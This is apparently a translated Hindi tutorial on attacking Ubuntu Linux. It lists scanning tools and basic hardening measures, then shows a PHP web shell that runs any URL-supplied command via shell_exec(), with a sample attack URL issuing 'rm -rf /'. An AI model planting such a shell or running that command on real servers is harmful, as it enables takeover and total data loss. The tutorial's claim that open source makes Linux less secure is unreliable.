लिनक्स ओएस हैकिंग: हैकिंग के साथ Ubuntu (कमांड ट्यूटोरियल)
लिनक्स सबसे व्यापक रूप से इस्तेमाल किया जाने वाला सर्वर ऑपरेटिंग सिस्टम है, खासकर वेब सर्वर के लिए। यह ओपन सोर्स है; इसका मतलब है कि कोई भी सोर्स कोड तक पहुँच सकता है। यह अन्य ऑपरेटिंग सिस्टम की तुलना में इसे कम सुरक्षित बनाता है क्योंकि हमलावर कमजोरियों को खोजने के लिए स्रोत कोड का अध्ययन कर सकते हैं. Linux हैकर्स के लिए इन कमजोरियों का फायदा उठाकर सिस्टम तक अनधिकृत पहुंच प्राप्त करना है।
इस लेख में हम आपको लिनक्स क्या है, इसकी सुरक्षा कमजोरियाँ, हैकिंग आदि से परिचित कराएँगे। Ubuntu और आप क्या प्रतिक्रियात्मक उपाय अपना सकते हैं।
लिनक्स पर त्वरित नोट
Linux एक ओपन सोर्स ऑपरेटिंग सिस्टम हैलिनक्स आधारित ऑपरेटिंग सिस्टम के कई वितरण हैं जैसे रेडहैट, फेडोरा, और Ubuntu, आदि। अन्य ऑपरेटिंग सिस्टम के विपरीत, सुरक्षा के मामले में लिनक्स कम सुरक्षित है। ऐसा इसलिए है क्योंकि स्रोत कोड स्वतंत्र रूप से उपलब्ध है, इसलिए अन्य ऑपरेटिंग सिस्टम की तुलना में कमजोरियों के लिए इसका अध्ययन करना और उनका फायदा उठाना आसान है जो ओपन सोर्स नहीं हैं। लिनक्स को सर्वर, डेस्कटॉप, टैबलेट या मोबाइल डिवाइस ऑपरेटिंग सिस्टम के रूप में इस्तेमाल किया जा सकता है।
लिनक्स प्रोग्राम को GUI या कमांड का उपयोग करके संचालित किया जा सकता है। Kali Linux हैकिंग GUI का उपयोग करने की तुलना में अधिक प्रभावी और कुशल है। इस कारण से, हैकिंग के लिए बुनियादी लिनक्स कमांड जानना मददगार होता है।
इन ट्यूटोरियल्स का संदर्भ लें https://www.guru99.com/unix-linux-tutorial.html कैसे शुरू करें पर Kali Linux हैक्स।
लिनक्स हैकिंग टूल्स
- Nessus– इस उपकरण का उपयोग किया जा सकता है Ubuntu हैक, स्कैन कॉन्फ़िगरेशन सेटिंग्स, पैच, और नेटवर्क आदि। इसे यहां पाया जा सकता है https://www.tenable.com/products/nessus
- एनमैप. इस टूल का उपयोग सर्वर पर चल रहे होस्ट और उनके द्वारा उपयोग की जा रही सेवाओं की निगरानी के लिए किया जा सकता है। इसका उपयोग पोर्ट को स्कैन करने के लिए भी किया जा सकता है। इसे यहाँ पाया जा सकता है https://nmap.org/
- सारा – SARA का मतलब है सिक्योरिटी ऑडिटर रिसर्च असिस्टेंट। जैसा कि नाम से ही पता चलता है, इस टूल का इस्तेमाल नेटवर्क को खतरों से बचाने के लिए किया जा सकता है जैसे कि SQL इंजेक्शन, XSS आदि इसे यहां पाया जा सकता है http://www-arc.com/sara/sara.html
उपरोक्त सूची संपूर्ण नहीं है; यह आपको उपलब्ध उपकरणों का एक विचार देती है Ubuntu लिनक्स सिस्टम को हैक करना और हैक करना।
लिनक्स हैकिंग को कैसे रोकें
लिनक्स हैकिंग ऑपरेटिंग सिस्टम की कमज़ोरियों का फ़ायदा उठाती है। कोई भी संगठन ऐसे हमलों से खुद को बचाने के लिए निम्नलिखित नीति अपना सकता है।
- पैच प्रबंधन- पैच उन बग को ठीक करते हैं जिनका हमलावर सिस्टम से समझौता करने के लिए फायदा उठाते हैं। एक अच्छी पैच प्रबंधन नीति यह सुनिश्चित करेगी कि आप अपने सिस्टम पर लगातार प्रासंगिक पैच लागू करें।
- उचित OS कॉन्फ़िगरेशन- अन्य शोषण सर्वर के कॉन्फ़िगरेशन में कमज़ोरियों का फ़ायदा उठाते हैं। निष्क्रिय उपयोगकर्ता नाम और डेमॉन को अक्षम किया जाना चाहिए। डिफ़ॉल्ट सेटिंग जैसे कि एप्लिकेशन के लिए सामान्य पासवर्ड, डिफ़ॉल्ट उपयोगकर्ता नाम और कुछ पोर्ट नंबर बदले जाने चाहिए।
- अतिक्रमण संसूचन प्रणाली- ऐसे उपकरणों का उपयोग सिस्टम में अनधिकृत पहुँच का पता लगाने के लिए किया जा सकता है। कुछ उपकरणों में ऐसे हमलों का पता लगाने और उन्हें रोकने की क्षमता होती है।
हैकिंग गतिविधि: हैक करें Ubuntu PHP का उपयोग कर लिनक्स सिस्टम
इस व्यावहारिक परिदृश्य में, हम सीखेंगे कि कैसे हैक किया जाए Ubuntu और हम आपको बुनियादी जानकारी प्रदान करेंगे कि आप इसका उपयोग कैसे कर सकते हैं PHP लिनक्स से समझौता करने के लिए। हम किसी भी पीड़ित को निशाना नहीं बनाने जा रहे हैं। यदि आप इसे आज़माना चाहते हैं, तो आप अपनी स्थानीय मशीन पर LAMPP इंस्टॉल कर सकते हैं।
PHP दो फ़ंक्शन के साथ आता है जिनका उपयोग लिनक्स हैकिंग कमांड को निष्पादित करने के लिए किया जा सकता है। इसमें exec() और shell_exec() फ़ंक्शन हैं। फ़ंक्शन exec() कमांड आउटपुट की अंतिम पंक्ति लौटाता है जबकि shell_exec() कमांड के पूरे परिणाम को स्ट्रिंग के रूप में लौटाता है।
प्रदर्शन के उद्देश्य से, मान लें कि हमलावर प्रबंधक निम्नलिखित फ़ाइल को वेब सर्वर पर अपलोड करते हैं।
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
यहाँ,
उपरोक्त स्क्रिप्ट cmd नामक GET वैरिएबल से कमांड प्राप्त करती है। कमांड को shell_exec() का उपयोग करके निष्पादित किया जाता है और परिणाम ब्राउज़र में लौटाए जाते हैं।
उपरोक्त कोड का उपयोग निम्नलिखित URL का उपयोग करके किया जा सकता है
http://localhost/cp/konsole.php?cmd=ls%20-l
यहाँ,
- “…konsole.php?cmd=ls%20-l”चर cmd को ls –l मान प्रदान करता है.
में आदेश Ubuntu सर्वर के खिलाफ हैकिंग के लिए निष्पादित किया जाएगा
shell_exec('ls -l') ;
वेब सर्वर पर उपरोक्त कोड निष्पादित करने से निम्नलिखित के समान परिणाम प्राप्त होते हैं।
उपरोक्त आदेश केवल वर्तमान निर्देशिका में फ़ाइलों और अनुमतियों को प्रदर्शित करता है
मान लीजिए हमलावर निम्नलिखित आदेश देता है
rm -rf /
यहाँ,
- “rm” फ़ाइलों को हटाता है
- “rf” rm कमांड को रिकर्सिव मोड में चलाता है। सभी फ़ोल्डर और फ़ाइलें हटाता है
- “/” कमांड को रूट डायरेक्टरी से फ़ाइलें हटाना शुरू करने का निर्देश देता है
आक्रमण का URL कुछ इस तरह दिखेगा
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
सारांश
- लिनक्स सर्वर, डेस्कटॉप, टैबलेट और मोबाइल उपकरणों के लिए एक लोकप्रिय ऑपरेटिंग सिस्टम है।
- Linux ओपन सोर्स है, और इसका सोर्स कोड कोई भी प्राप्त कर सकता है। इससे कमज़ोरियों को पहचानना आसान हो जाता है। यह हैकर्स के लिए सबसे अच्छे ओएस में से एक है।
- बुनियादी और नेटवर्किंग हैकिंग कमांड Ubuntu लिनक्स हैकर्स के लिए मूल्यवान हैं।
- कमजोरियाँ ऐसी कमज़ोरी होती हैं जिनका उपयोग किसी सिस्टम को खतरे में डालने के लिए किया जा सकता है।
- एक अच्छी सुरक्षा प्रणाली को हमलावर द्वारा खतरे से बचाने में मदद कर सकती है।